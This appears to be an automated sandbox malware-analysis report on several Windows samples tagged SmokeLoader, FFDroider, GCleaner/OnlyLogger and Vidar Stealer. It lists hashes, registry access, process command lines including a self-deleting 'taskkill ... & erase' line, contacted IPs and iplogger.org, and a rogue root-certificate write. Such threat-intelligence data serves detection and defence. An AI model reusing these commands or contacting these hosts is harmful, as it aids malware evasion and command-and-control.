| SHA512 | aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831 |
memory/1724-101-0x0000000000400000-0x00000000021A3000-memory.dmp
\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
memory/1724-107-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1724-108-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1724-109-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1724-110-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1724-111-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1724-112-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1724-113-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1724-114-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1724-115-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1724-116-0x0000000000400000-0x00000000021A3000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win7-20241010-en
Max time kernel
149s
Max time network
155s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\anyname.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\anyname.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
138s
Command Line
Signatures
SmokeLoader
Smokeloader family
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\justdezine.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\justdezine.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\justdezine.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\justdezine.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\justdezine.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\justdezine.exe
"C:\Users\Admin\AppData\Local\Temp\justdezine.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 644 -ip 644
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 352
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
memory/644-2-0x0000000000400000-0x0000000000408000-memory.dmp
memory/644-1-0x0000000001E60000-0x0000000001F60000-memory.dmp
memory/644-3-0x0000000000400000-0x0000000001D6E000-memory.dmp
memory/644-6-0x0000000000400000-0x0000000000408000-memory.dmp
memory/644-5-0x0000000000400000-0x0000000001D6E000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
141s
Command Line
Signatures
FFDroider
FFDroider payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Ffdroider family
Reads user/profile data of web browsers
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe
"C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 186.2.171.3:80 | 186.2.171.3 | tcp |
| RU | 186.2.171.3:443 | 186.2.171.3 | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.171.2.186.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
Files
memory/5008-0-0x0000000000400000-0x000000000062C000-memory.dmp
memory/5008-1-0x00000000001C0000-0x00000000001C3000-memory.dmp
memory/5008-5-0x0000000000400000-0x000000000062C000-memory.dmp
memory/5008-9-0x0000000003B90000-0x0000000003BA0000-memory.dmp
memory/5008-15-0x0000000003CF0000-0x0000000003D00000-memory.dmp
memory/5008-22-0x00000000047A0000-0x00000000047A8000-memory.dmp
memory/5008-23-0x00000000047C0000-0x00000000047C8000-memory.dmp
memory/5008-25-0x0000000004880000-0x0000000004888000-memory.dmp
memory/5008-28-0x0000000004840000-0x0000000004848000-memory.dmp
memory/5008-29-0x00000000049C0000-0x00000000049C8000-memory.dmp
memory/5008-30-0x0000000004C60000-0x0000000004C68000-memory.dmp
memory/5008-31-0x0000000004B60000-0x0000000004B68000-memory.dmp
memory/5008-32-0x00000000049D0000-0x00000000049D8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | ac8885d93e2f8e6c9dc3d0224cde9b2f |
| SHA1 | 92df06228b955eecab243ca2280312fa2c8c36be |
| SHA256 | 86eadffb11f189b6c8e7c42783826c2ecb14db3faf62b40537bd02acd961e3c3 |
| SHA512 | da5a3e25ab4618b3cd61325cdd456357f22aedf4c93ca4057dad33f82bf7018e303a02fabcfe534c98e8d36b1b7b5a8fc2387c1446a80f7b00722dded4a8b64b |
memory/5008-45-0x00000000047C0000-0x00000000047C8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 4eef179d6cebb253583309014252509a |
| SHA1 | 4cc510d0552f4ad954b5f2522df35c39740ebd90 |
| SHA256 | 40a03c7986e14dfa18eefb6fe00078bcdaee1f0663c8152beb9340580fdd6f39 |
| SHA512 | f6ab9a60d56f3ba63e8d93d7522e66c0a2f652b39bef9ba2ee2b98a94de5e79d5713121fd5a31e650be866422af8a37613cb5212081c1d4e04cb2340512d5392 |
memory/5008-53-0x00000000049D0000-0x00000000049D8000-memory.dmp
memory/5008-55-0x0000000004B00000-0x0000000004B08000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 64e1478794737018b6f808385135252c |
| SHA1 | 3538603ef569cad89a7593ab7b66bbfef54fe796 |
| SHA256 | e392121c5956167d8ca5fe2239156ce63fce60fbcce7b36b5cce5a910f9cf787 |
| SHA512 | f11afaa6b0262240e1ebdcd80928155534c69fa90ea882485eb3ddb2e525fa9613ea4ef7555540e78cf2a664407b759c65d61e1ddde1a4131faab207da1ed51b |
memory/5008-68-0x00000000047C0000-0x00000000047C8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | a871b40c5b59394bf043cdc01f5f3e9f |
| SHA1 | ca3a79e0388742f9c8cd2640ec180833fbcd73ae |
| SHA256 | 972d0c60e4c1593f392d63dc2a5b16e0c7106a566714374db7bb0da7ea231b75 |
| SHA512 | f989ba46e63ad97ba75d584273b12ff037f44b830cf1b4d7ad80331095ec35e02c86f7e81964c8b381dada36c9c9eba577f9626f583f738cd95d4d5df8ba993c |
memory/5008-76-0x0000000004B00000-0x0000000004B08000-memory.dmp
memory/5008-78-0x00000000049D0000-0x00000000049D8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | eb48a5bb5c881570ccc2b56fb3329ad8 |
| SHA1 | 54c7186b563a15426e8387a00a7ee090332a10e9 |
| SHA256 | 644d9ac4ad8fa476e7df7f78e7238ec8562c6e2a73afa23389db23c451935890 |
| SHA512 | 84323f7352cd3ad9d3769be9b1c83832d2ac3ef327d370838b3f3be60f8b54829adebb858312c09d2d6ef95f643b5bd1912eb1fd542890b1f864e45685498278 |
C:\Users\Admin\AppData\Local\Temp\d
| MD5 | 3d3c92209f30201a94ba342630bfac95 |
| SHA1 | bf2f7618241cc84a76282fc62b70737fd04ef32b |
| SHA256 | f3fbdf01b37d0350ef4f537e229b0ce5cb864d8b43d2c4d1bedf53b14439ebea |
| SHA512 | d8e090030856b9830581d083d9fcaf7b53a577d676cb1d00097c6a6297eb64bf80d2c4a9332db8636e1dfe3bcb90186102d750318ce2830d0fc1ff43d15bf592 |
memory/5008-117-0x0000000004680000-0x0000000004688000-memory.dmp
memory/5008-118-0x00000000046A0000-0x00000000046A8000-memory.dmp
memory/5008-126-0x0000000004740000-0x0000000004748000-memory.dmp
memory/5008-129-0x0000000004750000-0x0000000004758000-memory.dmp
memory/5008-130-0x00000000048D0000-0x00000000048D8000-memory.dmp
memory/5008-131-0x0000000005170000-0x0000000005178000-memory.dmp
memory/5008-132-0x0000000004A70000-0x0000000004A78000-memory.dmp
memory/5008-133-0x00000000048E0000-0x00000000048E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 3a6bbc43ec7eb4c72a6a961c1b4f3903 |
| SHA1 | 561604811dcde65f516e0259668ff4fad3278ed8 |
| SHA256 | 09eb3982a46a0e6caaadb84174b4447b2e303ff9aae442b09f0ce1020101875a |
| SHA512 | 150fcfeb3ac714e02a55b70cfb9a5382271f587caba8a584ab666d8d538837f3197b52d62534966b8158dea1918f9a376c70850a7de9c787e97024f3faa33578 |
memory/5008-146-0x00000000046A0000-0x00000000046A8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 7f9668716d2535eb5baeb7801585da34 |
| SHA1 | b71bf7b27caa96aeb8a44c4b0312d34d469a37bf |
| SHA256 | 1f6d7ec893eb981fc968886040fb4a694b69ff28e543e2a0771f7e4290cb88d8 |
| SHA512 | 990dc575a6034644e3db9c05feac8afc8ccf863cce2a1a872af207d2254ee2b3a6c3e93a7fed5d11936a0af646d4288ead8a28e2b44b97f3bf524a89dd36ecdf |
memory/5008-154-0x00000000048E0000-0x00000000048E8000-memory.dmp
memory/5008-156-0x0000000004A10000-0x0000000004A18000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 7744a8fe8584c6bcfd840af378c1bdd3 |
| SHA1 | d1ee0128619dea0f9b7b69a7b7f6fabf7fa30586 |
| SHA256 | e088b90f1fe74c1cf636de3b772859eb1a1e1878e102edcbe522909f27245e02 |
| SHA512 | 8381188ab732fb9c43979b7a39d79db8726db6311532442f3ce51277efe5bcf14ac1a3ac1423a0fcd5895883a26f4ebb3b9f19f92bb32f5a7f923432da86b428 |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 84fb887dc2aaa73773574097100339fb |
| SHA1 | 314d51cfc78d539dac4b4eabf376eb16223edf87 |
| SHA256 | 1a70a06cd7dd2d9c3a961a1272aee671571f76b4ce73ce50055e25ff2713be46 |
| SHA512 | 6bee65888c7d4a811f717cfc6d06c1d805a41fc08eaa39528e49088ebce7fa86eb7db58ed9c3db7d9046f0e588c16251ec6a7b7fd005e8feecab8f75b45157a1 |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | d3e7e4092b16c6f267cb1224ade0fcf7 |
| SHA1 | a54f2473a864476e7d4aceb6d825151237e88f91 |
| SHA256 | 58f06b1be57bb1e5775c3d7f2a3107e851888f2b19f3d108c2b6ee8e56f56446 |
| SHA512 | 4a77fd6d3c8d3c1d0c07c37a24705249fad04b5040b469dd67f31f3b2c594db0839a74ac6b6c8be2a93e029a7c8b1c78d26211c21fc9b53d5c9a89182e081f95 |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | ba94c7a9ca3b569144ad95ec70acf7b3 |
| SHA1 | 3679c1661a698675c85fe27aafa8efe3330d4be6 |
| SHA256 | dc3e9d6fba1284f67e5fb574a6b042672c228a6299d911da18517496ac4b24f5 |
| SHA512 | 42d4c66b385ae08150d9d5ce131a572f41d39b12181fab527f6e04a42947b26c98c2d9b85291c5b679a909ed840810787b506b63d3650265f36982397ba97f23 |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 3e63debfce158e194d8e5d9d5c1815a2 |
| SHA1 | 4fde31990f074ead11dffc9e4dc127fe6985959b |
| SHA256 | 30a3ed4af685ddc8290c226e42fefbd5f4c6f0402264a7df5d2501242c001cee |
| SHA512 | d4de9e8b989fb77ce6ed8b38a1288c35f327454c9b6c537e67597b48cfa39b3128dba450e471a2fa7e2eae9439f4bdbbb9fd438d95efa416cf38c80125b5cc3d |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | c8a665d20cd53d2d77757f15a72cca79 |
| SHA1 | 6b1ee30cb2041661446bf742fa76f32798e10fcc |
| SHA256 | 9f1b1539002c38146dbee1ec00f405c8ec4674916dc5cdf029f8e211a5cbb5fe |
| SHA512 | 6d39a3351a6c8c5f57b1f4368f6350e35d7b014daf1d4b5e9fd18fbe12dac5a28b9d019afd47df5c62490eaced31d3c3206892084fd80fb99ac1c1f887b90dd5 |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | aac80233768475c4678741845a233ea9 |
| SHA1 | 84adef834d151434361cf6fa4c682eb10d6c95a0 |
| SHA256 | 9572c89fd04403fcfc9aa96b6efde9863f0885b8664893327c249fa04a338584 |
| SHA512 | a394cde5d0dfa644b3325941c990f691664557dad0f7619e957ed6a0e35dd424562c64917a02d072f24deda058a227383e9f6c1d44b54401fdf698a40cc260db |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | b54cef283028c5e37e4c124ee734c062 |
| SHA1 | b5f90a603fd8726b5e7ec0740a2d63ad6103c25e |
| SHA256 | 59ffe41fdc70071858911fc41cb1fb0273c96f6b0d404d94e3ddf6b0251c6faa |
| SHA512 | 4f64299d5d70e3f59618f130aae9ca4bf21a66b0613c9c6d6ae909a8f26386debfad5fe4816832949b5c5b29665370d852cc4e9fe803c2abbf101664d4a3b029 |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 46bfc7e3be538bc2d87ce1c51bbf40fe |
| SHA1 | fd85f8e2d43b8b16364b2135d9ff81d3e0249610 |
| SHA256 | 626a65d55e12caba8b7a2d1db830ebaebd321e05a036fcfb4e549eb139c370ba |
| SHA512 | b69d76fe37697deecf0a48ce0ac4b06ee5056ad54512b39133a527dbef78aa66417552262f86d50a37a11b8313165733ee269fc10f7c4ef5401792403f38acaf |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 354f962de4e2d5d7ddff86f9df831085 |
| SHA1 | c4c5286a42ed1dc45b123cf1933ce3b476183cfd |
| SHA256 | 9a7d2f310320eb1a019f76b2d4b7d0336cff7bcaec05e9eb55a7219821af30be |
| SHA512 | bec64ba55f83196af143da509593aefbbefb1cb9e09b18085cb8bfb374b0787aa79995af84d7281a470bcbe1a7f379f94086e6393603ce85268a82de11471fd3 |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 165d2a71cf465ef8fb523973df95e221 |
| SHA1 | e7ddcb2d08b013b785f71939b803bf00d726c1d6 |
| SHA256 | e03728fccc0f6b57046f014201b9707d6cdd7cb30f1170b6c623efcb54da316e |
| SHA512 | 97708c21a84eecf303e5645dbd38b10dad84dceea9023158fe10ca2cd4e921fb6a23d853f5949b21768de0f3b60000cca1d2dfd9bc676dd4ac49f94e3b249a8a |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | eaeaabb1eee19f0277d1db2da027c4e0 |
| SHA1 | 534c9349ba4d5a1faae5660787e007442eb3817c |
| SHA256 | d2de6ad5e13f35d253f3b145e8104c8a19ae9d6c806a405dd519ffa50bb449b3 |
| SHA512 | 0bd36c5941fd834d20a062865715606cec1d7c3099b8c72353d66793c4c54052cc67e0073ddca00f8a5dab2221d51f26c253dcf6742169d880651d75e5498df1 |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 92a5276d578ef04eda4184f968b72440 |
| SHA1 | 2e563e5ac75512974d2bc60542f58b75d41cd8c0 |
| SHA256 | 09687e00fe116cee8a7e412412b6e20acec7f1d7e33ae9350a769b4ffed88154 |
| SHA512 | 2e49ea9b6abe9fd63068279096be9f314a34f5a7612d3140a13042715545d210f4c9d94a378328b00235a44529056d2117af1aa5ed6b89f64e8f4207bb7e6fad |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 5638226b2709c7af7f1961975bfabf60 |
| SHA1 | 1c4d998d8182720c2feab64de5a84b2073a609cb |
| SHA256 | f61b80cce435828bf374cf4636617e00594ff096d44c8c14dc815f46907d2d6c |
| SHA512 | f7cea61d8b93ca0d6b1574aceeb999655cc5aafe45b62921d4c39893565461d0ec757302c408811f64ec0ef16aa8b28ef6e8722d0d4b6d516e3f2a59ed9c657b |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | ed2f9596bf43bd42717c4b1cbd87c9cd |
| SHA1 | aaf29786c21a23adb5e24fe746a09442762a84d1 |
| SHA256 | de2f05510f896048c5e4df7499df91a86fa08b2c30351e63f3bebf89cb7a7d7c |
| SHA512 | b34e3dcd80ddfc657237de191c6eba601bd571bf9e6be7eaa61ad85b14f91e1447c2360dd447014814a8592815c2534636299dd082fed04995587540efefc6e8 |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 71d016b8653670882488bd8cd75c2c5a |
| SHA1 | be061ec4372503b0ad2ee9f2e0a8ae54c8eb2ed4 |
| SHA256 | bc874e4b1cc727e29a573d606cc60f53276c3fd38300d886ef16e06c6cf6188d |
| SHA512 | 0fd3a2d268ee5d73281ae666a2d24a976879a7c0e46f300130ff506a7d4dc090fe274e659f0761e6957aeb2fc501e568ea7c058bdb901f53b424906ae284c5b4 |
C:\Users\Admin\AppData\Local\Temp\d.INTEG.RAW
| MD5 | cf786aa79f52c2f08772c9706afcad5c |
| SHA1 | 04acdb997bc3dfc238c1d106896a01fe5a539595 |
| SHA256 | fc7a9e6406b5070737e2b54a84be750c52db11405ca8f3449b544d99bedca7b1 |
| SHA512 | d3c7336f9eed3c87b9f3273cb916ea0bb5bec1636ff669b8e0231ee4f60054a39752509226d60de529542e05031b96f90b42fd8edacd053868de8f3e8a687eef |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 8c29c41fcc58d5426bf1e77a3e46d102 |
| SHA1 | 40c5869fa13dc6f82db852fbaee34c20f616b561 |
| SHA256 | 18350cf03d0d7d08795ab10c4a61db61ace5a861e390a1e1cb3a28208ee9e72d |
| SHA512 | 5e8a77fdb23beb31a0b4cb19bb008c834c8e4f1ca212227144eb7f57bcdab8f1d1b4608bd1f4446ccf5c5ef6c0f312bf61b36400f1aa92f0c13004c9766fcfce |
memory/5008-508-0x0000000000400000-0x000000000062C000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win7-20240729-en
Max time kernel
132s
Max time network
129s
Command Line
Signatures
GCleaner
Gcleaner family
OnlyLogger
Onlylogger family
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\mixseven.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\mixseven.exe
"C:\Users\Admin\AppData\Local\Temp\mixseven.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{wl6t-xCws4-OUmR-lkfk2}\34368444286.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{wl6t-xCws4-OUmR-lkfk2}\11290150352.exe" /mix
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{wl6t-xCws4-OUmR-lkfk2}\18445490935.exe" /mix
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "mixseven.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\mixseven.exe" & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "mixseven.exe" /f
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | garbage-cleaner.biz | udp |
| UA | 194.145.227.161:80 | 194.145.227.161 | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:80 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
Files
memory/2632-1-0x0000000000400000-0x0000000001D82000-memory.dmp
memory/2632-2-0x0000000000400000-0x0000000001D82000-memory.dmp
memory/2632-29-0x0000000000400000-0x0000000001D82000-memory.dmp
C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe
| MD5 | 6445250d234e789c0c2afe69f119e326 |
| SHA1 | 03074f75c0ff50783d8c2e32d96e39b746540f66 |
| SHA256 | 2e6cd9433e66a9ebde268bc6949d4660de441790bd39ffc9cb0f4caaeb44320f |
| SHA512 | ecd094a4d026378f85435f8a2dc16c92c033aff92ba126d8bbb22d6b279b842d417f4df0f63199ea248d0ec64b9679acb5a1f835560d8e3c5b84be492cc0e68e |
memory/2632-36-0x0000000000400000-0x0000000001D82000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win7-20240903-en
Max time kernel
120s
Max time network
127s
Command Line
Signatures
Vidar
Vidar family
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Litever01.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Litever01.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f9